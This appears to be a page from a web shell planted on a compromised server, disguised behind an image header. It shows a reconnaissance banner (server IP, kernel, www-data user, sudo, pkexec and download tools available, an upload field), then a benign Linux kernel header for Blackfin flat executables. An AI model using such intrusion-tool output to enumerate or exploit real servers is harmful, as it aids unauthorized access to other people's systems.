????JFIF??x?x????'
Server IP : 79.136.114.73 / Your IP : 3.128.205.62 Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64 User : www-data ( 33) PHP Version : 5.5.9-1ubuntu4.29 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority, MySQL : ON | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /lib/modules/3.13.0-170-generic/build/arch/blackfin/include/asm/ |
Upload File : |
/* * uClinux flat-format executables * * Copyright 2003-2009 Analog Devices Inc. * * Licensed under the GPL-2 */ #ifndef __BLACKFIN_FLAT_H__ #define __BLACKFIN_FLAT_H__ #include <asm/unaligned.h> #define flat_argvp_envp_on_stack() 0 #define flat_old_ram_flag(flags) (flags) extern unsigned long bfin_get_addr_from_rp (unsigned long *ptr, unsigned long relval, unsigned long flags, unsigned long *persistent); extern void bfin_put_addr_at_rp(unsigned long *ptr, unsigned long addr, unsigned long relval); /* The amount by which a relocation can exceed the program image limits without being regarded as an error. */ #define flat_reloc_valid(reloc, size) ((reloc) <= (size)) #define flat_get_addr_from_rp(rp, relval, flags, persistent) \ bfin_get_addr_from_rp(rp, relval, flags, persistent) #define flat_put_addr_at_rp(rp, val, relval) \ bfin_put_addr_at_rp(rp, val, relval) /* Convert a relocation entry into an address. */ static inline unsigned long flat_get_relocate_addr (unsigned long relval) { return relval & 0x03ffffff; /* Mask out top 6 bits */ } static inline int flat_set_persistent(unsigned long relval, unsigned long *persistent) { int type = (relval >> 26) & 7; if (type == 3) { *persistent = relval << 16; return 1; } return 0; } static inline int flat_addr_absolute(unsigned long relval) { return (relval & (1 << 29)) != 0; } #endif /* __BLACKFIN_FLAT_H__ */